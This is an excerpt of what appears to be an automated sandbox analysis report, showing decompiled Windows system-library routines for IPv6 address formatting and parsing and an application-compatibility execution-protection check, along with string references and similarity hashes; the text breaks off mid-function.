                                                                                                                                                  0x00c78999
                                                                                                                                                  0x00c789ad
                                                                                                                                                  0x00cc1ba8
                                                                                                                                                  0x00cc1ba8
                                                                                                                                                  0x00c789ad
                                                                                                                                                  0x00c789b6
                                                                                                                                                  0x00c789c8
                                                                                                                                                  0x00c789cd
                                                                                                                                                  0x00c789d0
                                                                                                                                                  0x00c789d0
                                                                                                                                                  0x00c789d6
                                                                                                                                                  0x00c789e8
                                                                                                                                                  0x00c789e8
                                                                                                                                                  0x00c789ed
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c789ed
                                                                                                                                                  0x00c7895a
                                                                                                                                                  0x00c7883e
                                                                                                                                                  0x00c78841
                                                                                                                                                  0x00c78844
                                                                                                                                                  0x00c78845
                                                                                                                                                  0x00c78848
                                                                                                                                                  0x00c7884d
                                                                                                                                                  0x00c78852
                                                                                                                                                  0x00c78b49
                                                                                                                                                  0x00c78858
                                                                                                                                                  0x00c7886c
                                                                                                                                                  0x00c7886c
                                                                                                                                                  0x00c78872
                                                                                                                                                  0x00cc1b0e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c78878
                                                                                                                                                  0x00c78881
                                                                                                                                                  0x00c7888b
                                                                                                                                                  0x00c7888e
                                                                                                                                                  0x00c78891
                                                                                                                                                  0x00c78896
                                                                                                                                                  0x00c78899
                                                                                                                                                  0x00c78899
                                                                                                                                                  0x00c7889e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cc1b21
                                                                                                                                                  0x00cc1b27
                                                                                                                                                  0x00cc1b2e
                                                                                                                                                  0x00cc1b42
                                                                                                                                                  0x00cc1b44
                                                                                                                                                  0x00cc1b44
                                                                                                                                                  0x00cc1b4c
                                                                                                                                                  0x00cc1b4f
                                                                                                                                                  0x00cc1b55
                                                                                                                                                  0x00cc1b55
                                                                                                                                                  0x00c788a4
                                                                                                                                                  0x00c788aa
                                                                                                                                                  0x00c788b1
                                                                                                                                                  0x00c788c5
                                                                                                                                                  0x00cc1b5b
                                                                                                                                                  0x00cc1b5b
                                                                                                                                                  0x00c788c5
                                                                                                                                                  0x00c788ce
                                                                                                                                                  0x00c788e0
                                                                                                                                                  0x00c788e5
                                                                                                                                                  0x00c788e8
                                                                                                                                                  0x00c788e8
                                                                                                                                                  0x00c788ee
                                                                                                                                                  0x00c78900
                                                                                                                                                  0x00c78900
                                                                                                                                                  0x00c78905
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c78905

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • Kernel-MUI-Language-Disallowed, xrefs: 00C78914
                                                                                                                                                  • Kernel-MUI-Number-Allowed, xrefs: 00C787E6
                                                                                                                                                  • Kernel-MUI-Language-Allowed, xrefs: 00C78827
                                                                                                                                                  • Kernel-MUI-Language-SKU, xrefs: 00C789FC
                                                                                                                                                  • WindowsExcludedProcs, xrefs: 00C787C1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _wcspbrk
                                                                                                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                  • API String ID: 402402107-258546922
                                                                                                                                                  • Opcode ID: 0be67161a8e790b81106187c563e4d481cf83bcbe66c615a113f3e4335a1f8b8
                                                                                                                                                  • Instruction ID: 30a26aad032da08177b643aab89378772fcedc698ea7361ba43a547266216c61
                                                                                                                                                  • Opcode Fuzzy Hash: 0be67161a8e790b81106187c563e4d481cf83bcbe66c615a113f3e4335a1f8b8
                                                                                                                                                  • Instruction Fuzzy Hash: 51F1F9B5D00209EFCF11DF95C985DEEB7B9FF08300F14846AEA15A7251DB349A49EB60
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 38%
                                                                                                                                                  			E00C913CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				intOrPtr* _v16;
                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                  				char _v24;
                                                                                                                                                  				intOrPtr _t71;
                                                                                                                                                  				signed int _t78;
                                                                                                                                                  				signed int _t86;
                                                                                                                                                  				char _t90;
                                                                                                                                                  				signed int _t91;
                                                                                                                                                  				signed int _t96;
                                                                                                                                                  				intOrPtr _t108;
                                                                                                                                                  				signed int _t114;
                                                                                                                                                  				void* _t115;
                                                                                                                                                  				intOrPtr _t128;
                                                                                                                                                  				intOrPtr* _t129;
                                                                                                                                                  				void* _t130;
                                                                                                                                                  
                                                                                                                                                  				_t129 = _a4;
                                                                                                                                                  				_t128 = _a8;
                                                                                                                                                  				_t116 = 0;
                                                                                                                                                  				_t71 = _t128 + 0x5c;
                                                                                                                                                  				_v8 = 8;
                                                                                                                                                  				_v20 = _t71;
                                                                                                                                                  				if( *_t129 == 0) {
                                                                                                                                                  					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                  						goto L5;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                  						if(_t96 != 0) {
                                                                                                                                                  							L38:
                                                                                                                                                  							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                  								goto L5;
                                                                                                                                                  							} else {
                                                                                                                                                  								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                  								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                  								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                  								_t86 = E00C87707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                  								L36:
                                                                                                                                                  								return _t128 + _t86 * 2;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                  						if(_t114 == 0) {
                                                                                                                                                  							L33:
                                                                                                                                                  							_t115 = 0xc52926;
                                                                                                                                                  							L35:
                                                                                                                                                  							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                  							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                  							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                  							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                  							_t86 = E00C87707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                  							goto L36;
                                                                                                                                                  						}
                                                                                                                                                  						if(_t114 != 0xffff) {
                                                                                                                                                  							_t116 = 0;
                                                                                                                                                  							goto L38;
                                                                                                                                                  						}
                                                                                                                                                  						if(_t114 != 0) {
                                                                                                                                                  							_t115 = 0xc59cac;
                                                                                                                                                  							goto L35;
                                                                                                                                                  						}
                                                                                                                                                  						goto L33;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					L5:
                                                                                                                                                  					_a8 = _t116;
                                                                                                                                                  					_a4 = _t116;
                                                                                                                                                  					_v12 = _t116;
                                                                                                                                                  					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                  						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                  							_v8 = 6;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t90 = _v8;
                                                                                                                                                  					if(_t90 <= _t116) {
                                                                                                                                                  						L11:
                                                                                                                                                  						if(_a8 - _a4 <= 1) {
                                                                                                                                                  							_a8 = _t116;
                                                                                                                                                  							_a4 = _t116;
                                                                                                                                                  						}
                                                                                                                                                  						_t91 = 0;
                                                                                                                                                  						if(_v8 <= _t116) {
                                                                                                                                                  							L22:
                                                                                                                                                  							if(_v8 < 8) {
                                                                                                                                                  								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                  								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                  								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                  								_t128 = _t128 + E00C87707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                  							}
                                                                                                                                                  							return _t128;
                                                                                                                                                  						} else {
                                                                                                                                                  							L14:
                                                                                                                                                  							L14:
                                                                                                                                                  							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                  								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                  									_push(":");
                                                                                                                                                  									_push(_t71 - _t128 >> 1);
                                                                                                                                                  									_push(_t128);
                                                                                                                                                  									_t128 = _t128 + E00C87707() * 2;
                                                                                                                                                  									_t71 = _v20;
                                                                                                                                                  									_t130 = _t130 + 0xc;
                                                                                                                                                  								}
                                                                                                                                                  								_t78 = E00C87707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                  								_t130 = _t130 + 0x10;
                                                                                                                                                  							} else {
                                                                                                                                                  								_push(L"::");
                                                                                                                                                  								_push(_t71 - _t128 >> 1);
                                                                                                                                                  								_push(_t128);
                                                                                                                                                  								_t78 = E00C87707();
                                                                                                                                                  								_t130 = _t130 + 0xc;
                                                                                                                                                  								_t91 = _a8 - 1;
                                                                                                                                                  							}
                                                                                                                                                  							_t91 = _t91 + 1;
                                                                                                                                                  							_t128 = _t128 + _t78 * 2;
                                                                                                                                                  							_t71 = _v20;
                                                                                                                                                  							if(_t91 >= _v8) {
                                                                                                                                                  								goto L22;
                                                                                                                                                  							}
                                                                                                                                                  							_t116 = 0;
                                                                                                                                                  							goto L14;
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						_t108 = 1;
                                                                                                                                                  						_v16 = _t129;
                                                                                                                                                  						_v24 = _t90;
                                                                                                                                                  						do {
                                                                                                                                                  							if( *_v16 == _t116) {
                                                                                                                                                  								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                  									_a4 = _v12;
                                                                                                                                                  									_a8 = _t108;
                                                                                                                                                  								}
                                                                                                                                                  								_t116 = 0;
                                                                                                                                                  							} else {
                                                                                                                                                  								_v12 = _t108;
                                                                                                                                                  							}
                                                                                                                                                  							_v16 = _v16 + 2;
                                                                                                                                                  							_t108 = _t108 + 1;
                                                                                                                                                  							_t26 =  &_v24;
                                                                                                                                                  							 *_t26 = _v24 - 1;
                                                                                                                                                  						} while ( *_t26 != 0);
                                                                                                                                                  						goto L11;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}




















                                                                                                                                                  0x00c9149c
                                                                                                                                                  0x00c9149f
                                                                                                                                                  0x00c914a2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c914a4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c914a4
                                                                                                                                                  0x00c91413
                                                                                                                                                  0x00c91415
                                                                                                                                                  0x00c91416
                                                                                                                                                  0x00c91419
                                                                                                                                                  0x00c9141c
                                                                                                                                                  0x00c91422
                                                                                                                                                  0x00c913b7
                                                                                                                                                  0x00c913bc
                                                                                                                                                  0x00c913bf
                                                                                                                                                  0x00c913bf
                                                                                                                                                  0x00c913c2
                                                                                                                                                  0x00c91424
                                                                                                                                                  0x00c91424
                                                                                                                                                  0x00c91424
                                                                                                                                                  0x00c91427
                                                                                                                                                  0x00c9142b
                                                                                                                                                  0x00c9142c
                                                                                                                                                  0x00c9142c
                                                                                                                                                  0x00c9142c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c9141c
                                                                                                                                                  0x00c91411

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                  • Opcode ID: 10617a1710b2d807960967e73edc257a541cada671106607eb109c712eefef58
                                                                                                                                                  • Instruction ID: dd52e4244b39c7ee55b30df15967e922f0eab13a6c2940c78a526f4f5fcd884a
                                                                                                                                                  • Opcode Fuzzy Hash: 10617a1710b2d807960967e73edc257a541cada671106607eb109c712eefef58
                                                                                                                                                  • Instruction Fuzzy Hash: 136126B1D00656AACF25DF5AC8858FEBBB5EF98301B18C16DF8A647640D234AB44DB60
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                  			E00C87EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				char _v540;
                                                                                                                                                  				unsigned int _v544;
                                                                                                                                                  				signed int _v548;
                                                                                                                                                  				intOrPtr _v552;
                                                                                                                                                  				char _v556;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				signed int _t33;
                                                                                                                                                  				void* _t38;
                                                                                                                                                  				unsigned int _t46;
                                                                                                                                                  				unsigned int _t47;
                                                                                                                                                  				unsigned int _t52;
                                                                                                                                                  				intOrPtr _t56;
                                                                                                                                                  				unsigned int _t62;
                                                                                                                                                  				void* _t69;
                                                                                                                                                  				void* _t70;
                                                                                                                                                  				intOrPtr _t72;
                                                                                                                                                  				signed int _t73;
                                                                                                                                                  				void* _t74;
                                                                                                                                                  				void* _t75;
                                                                                                                                                  				void* _t76;
                                                                                                                                                  				void* _t77;
                                                                                                                                                  
                                                                                                                                                  				_t33 =  *0xd32088; // 0x777a2caa
                                                                                                                                                  				_v8 = _t33 ^ _t73;
                                                                                                                                                  				_v548 = _v548 & 0x00000000;
                                                                                                                                                  				_t72 = _a4;
                                                                                                                                                  				if(E00C87F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                  					__eflags = _v548;
                                                                                                                                                  					if(_v548 == 0) {
                                                                                                                                                  						goto L1;
                                                                                                                                                  					}
                                                                                                                                                  					_t62 = _t72 + 0x24;
                                                                                                                                                  					E00CA3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                  					_t71 = 0x214;
                                                                                                                                                  					_v544 = 0x214;
                                                                                                                                                  					E00C5DFC0( &_v540, 0, 0x214);
                                                                                                                                                  					_t75 = _t74 + 0x20;
                                                                                                                                                  					_t46 =  *0xd34218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                  					__eflags = _t46;
                                                                                                                                                  					if(_t46 == 0) {
                                                                                                                                                  						goto L1;
                                                                                                                                                  					}
                                                                                                                                                  					_t47 = _v544;
                                                                                                                                                  					__eflags = _t47;
                                                                                                                                                  					if(_t47 == 0) {
                                                                                                                                                  						goto L1;
                                                                                                                                                  					}
                                                                                                                                                  					__eflags = _t47 - 0x214;
                                                                                                                                                  					if(_t47 >= 0x214) {
                                                                                                                                                  						goto L1;
                                                                                                                                                  					}
                                                                                                                                                  					_push(_t62);
                                                                                                                                                  					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                  					E00CA3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                  					_t52 = E00C60D27( &_v540, L"Execute=1");
                                                                                                                                                  					_t76 = _t75 + 0x1c;
                                                                                                                                                  					_push(_t62);
                                                                                                                                                  					__eflags = _t52;
                                                                                                                                                  					if(_t52 == 0) {
                                                                                                                                                  						E00CA3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                  						_t71 =  &_v540;
                                                                                                                                                  						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                  						_t77 = _t76 + 0x14;
                                                                                                                                                  						_v552 = _t56;
                                                                                                                                                  						__eflags = _t71 - _t56;
                                                                                                                                                  						if(_t71 >= _t56) {
                                                                                                                                                  							goto L1;
                                                                                                                                                  						} else {
                                                                                                                                                  							goto L10;
                                                                                                                                                  						}
                                                                                                                                                  						while(1) {
                                                                                                                                                  							L10:
                                                                                                                                                  							_t62 = E00C68375(_t71, 0x20);
                                                                                                                                                  							_pop(_t69);
                                                                                                                                                  							__eflags = _t62;
                                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                                  								__eflags = 0;
                                                                                                                                                  								 *_t62 = 0;
                                                                                                                                                  							}
                                                                                                                                                  							E00CA3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                  							_t77 = _t77 + 0x10;
                                                                                                                                                  							E00CCE8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                  							__eflags = _t62;
                                                                                                                                                  							if(_t62 == 0) {
                                                                                                                                                  								goto L1;
                                                                                                                                                  							}
                                                                                                                                                  							_t31 = _t62 + 2; // 0x2
                                                                                                                                                  							_t71 = _t31;
                                                                                                                                                  							__eflags = _t71 - _v552;
                                                                                                                                                  							if(_t71 >= _v552) {
                                                                                                                                                  								goto L1;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                  					_push(3);
                                                                                                                                                  					_push(0x55);
                                                                                                                                                  					E00CA3F92();
                                                                                                                                                  					_t38 = 1;
                                                                                                                                                  					L2:
                                                                                                                                                  					return E00C5E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                  				}
                                                                                                                                                  				L1:
                                                                                                                                                  				_t38 = 0;
                                                                                                                                                  				goto L2;
                                                                                                                                                  			}




























                                                                                                                                                  APIs
                                                                                                                                                  • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00CA3F12
                                                                                                                                                  Strings
                                                                                                                                                  • Execute=1, xrefs: 00CA3F5E
                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00CA3F4A
                                                                                                                                                  • ExecuteOptions, xrefs: 00CA3F04
                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00CA3F75
                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00CA3EC4
                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 00CAE345
                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00CAE2FB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BaseDataModuleQuery
                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                  • API String ID: 3901378454-484625025
                                                                                                                                                  • Opcode ID: 935c5a28e0b678ae623ecd1b8fdd55472177f11c3ed0048ed3aca8f4283717ad
                                                                                                                                                  • Instruction ID: bb366d0e67f46a6292d4df6b142ccd4955836142a5850749f28942051dfdf36f
                                                                                                                                                  • Opcode Fuzzy Hash: 935c5a28e0b678ae623ecd1b8fdd55472177f11c3ed0048ed3aca8f4283717ad
                                                                                                                                                  • Instruction Fuzzy Hash: 9F410932A4030D7ADF20EAD4DCC6FDA73BCAB15709F1401A9F605E7091E670DB899BA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00C90B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				signed int _v16;
                                                                                                                                                  				signed int _v20;
                                                                                                                                                  				signed int _v24;
                                                                                                                                                  				signed int _v28;
                                                                                                                                                  				signed int _v32;
                                                                                                                                                  				void* _t108;
                                                                                                                                                  				void* _t116;
                                                                                                                                                  				char _t120;
                                                                                                                                                  				short _t121;
                                                                                                                                                  				void* _t128;
                                                                                                                                                  				intOrPtr* _t130;
                                                                                                                                                  				char _t132;
                                                                                                                                                  				short _t133;
                                                                                                                                                  				intOrPtr _t141;
                                                                                                                                                  				signed int _t156;
                                                                                                                                                  				signed int _t174;
                                                                                                                                                  				intOrPtr _t177;
                                                                                                                                                  				intOrPtr* _t179;
                                                                                                                                                  				intOrPtr _t180;
                                                                                                                                                  				void* _t183;
                                                                                                                                                  
                                                                                                                                                  				_t179 = _a4;
                                                                                                                                                  				_t141 =  *_t179;
                                                                                                                                                  				_v16 = 0;
                                                                                                                                                  				_v28 = 0;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_v24 = 0;
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				_v32 = 0;
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				if(_t141 == 0) {
                                                                                                                                                  					L41:
                                                                                                                                                  					 *_a8 = _t179;
                                                                                                                                                  					_t180 = _v24;
                                                                                                                                                  					if(_t180 != 0) {
                                                                                                                                                  						if(_t180 != 3) {
                                                                                                                                                  							goto L6;
                                                                                                                                                  						}
                                                                                                                                                  						_v8 = _v8 + 1;
                                                                                                                                                  					}
                                                                                                                                                  					_t174 = _v32;
                                                                                                                                                  					if(_t174 == 0) {
                                                                                                                                                  						if(_v8 == 7) {
                                                                                                                                                  							goto L43;
                                                                                                                                                  						}
                                                                                                                                                  						goto L6;
                                                                                                                                                  					}
                                                                                                                                                  					L43:
                                                                                                                                                  					if(_v16 != 1) {
                                                                                                                                                  						if(_v16 != 2) {
                                                                                                                                                  							goto L6;
                                                                                                                                                  						}
                                                                                                                                                  						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                  						L47:
                                                                                                                                                  						if(_t174 != 0) {
                                                                                                                                                  							E00C68980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                                                                                  							_t116 = 8;
                                                                                                                                                  							E00C5DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                                                                                  						}
                                                                                                                                                  						return 0;
                                                                                                                                                  					}
                                                                                                                                                  					if(_t180 != 0) {
                                                                                                                                                  						if(_v12 > 3) {
                                                                                                                                                  							goto L6;
                                                                                                                                                  						}
                                                                                                                                                  						_t120 = E00C90CFA(_v28, 0, 0xa);
                                                                                                                                                  						_t183 = _t183 + 0xc;
                                                                                                                                                  						if(_t120 > 0xff) {
                                                                                                                                                  							goto L6;
                                                                                                                                                  						}
                                                                                                                                                  						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                                                                                  						goto L47;
                                                                                                                                                  					}
                                                                                                                                                  					if(_v12 > 4) {
                                                                                                                                                  						goto L6;
                                                                                                                                                  					}
                                                                                                                                                  					_t121 = E00C90CFA(_v28, _t180, 0x10);
                                                                                                                                                  					_t183 = _t183 + 0xc;
                                                                                                                                                  					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                                                                                  					goto L47;
                                                                                                                                                  				} else {
                                                                                                                                                  					while(1) {
                                                                                                                                                  						_t123 = _v16;
                                                                                                                                                  						if(_t123 == 0) {
                                                                                                                                                  							goto L7;
                                                                                                                                                  						}
                                                                                                                                                  						_t108 = _t123 - 1;
                                                                                                                                                  						if(_t108 != 0) {
                                                                                                                                                  							goto L1;
                                                                                                                                                  						}
                                                                                                                                                  						_t178 = _t141;
                                                                                                                                                  						if(E00C906BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                                                                                  							if(E00C906BA(_t135, _t178) == 0 || E00C90A5B(_t136, _t178) == 0) {
                                                                                                                                                  								if(_t141 != 0x3a) {
                                                                                                                                                  									if(_t141 == 0x2e) {
                                                                                                                                                  										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                                                                                  											goto L41;
                                                                                                                                                  										} else {
                                                                                                                                                  											_v24 = _v24 + 1;
                                                                                                                                                  											L27:
                                                                                                                                                  											_v16 = _v16 & 0x00000000;
                                                                                                                                                  											L28:
                                                                                                                                                  											if(_v28 == 0) {
                                                                                                                                                  												goto L20;
                                                                                                                                                  											}
                                                                                                                                                  											_t177 = _v24;
                                                                                                                                                  											if(_t177 != 0) {
                                                                                                                                                  												if(_v12 > 3) {
                                                                                                                                                  													L6:
                                                                                                                                                  													return 0xc000000d;
                                                                                                                                                  												}
                                                                                                                                                  												_t132 = E00C90CFA(_v28, 0, 0xa);
                                                                                                                                                  												_t183 = _t183 + 0xc;
                                                                                                                                                  												if(_t132 > 0xff) {
                                                                                                                                                  													goto L6;
                                                                                                                                                  												}
                                                                                                                                                  												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                                                                                  												goto L20;
                                                                                                                                                  											}
                                                                                                                                                  											if(_v12 > 4) {
                                                                                                                                                  												goto L6;
                                                                                                                                                  											}
                                                                                                                                                  											_t133 = E00C90CFA(_v28, 0, 0x10);
                                                                                                                                                  											_t183 = _t183 + 0xc;
                                                                                                                                                  											_v20 = _v20 + 1;
                                                                                                                                                  											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                                                                                  											goto L20;
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									goto L41;
                                                                                                                                                  								}
                                                                                                                                                  								if(_v24 > 0 || _v8 > 6) {
                                                                                                                                                  									goto L41;
                                                                                                                                                  								} else {
                                                                                                                                                  									_t130 = _t179 + 1;
                                                                                                                                                  									if( *_t130 == _t141) {
                                                                                                                                                  										if(_v32 != 0) {
                                                                                                                                                  											goto L41;
                                                                                                                                                  										}
                                                                                                                                                  										_v32 = _v8 + 1;
                                                                                                                                                  										_t156 = 2;
                                                                                                                                                  										_v8 = _v8 + _t156;
                                                                                                                                                  										L34:
                                                                                                                                                  										_t179 = _t130;
                                                                                                                                                  										_v16 = _t156;
                                                                                                                                                  										goto L28;
                                                                                                                                                  									}
                                                                                                                                                  									_v8 = _v8 + 1;
                                                                                                                                                  									goto L27;
                                                                                                                                                  								}
                                                                                                                                                  							} else {
                                                                                                                                                  								_v12 = _v12 + 1;
                                                                                                                                                  								if(_v24 > 0) {
                                                                                                                                                  									goto L41;
                                                                                                                                                  								}
                                                                                                                                                  								_a7 = 1;
                                                                                                                                                  								goto L20;
                                                                                                                                                  							}
                                                                                                                                                  						} else {
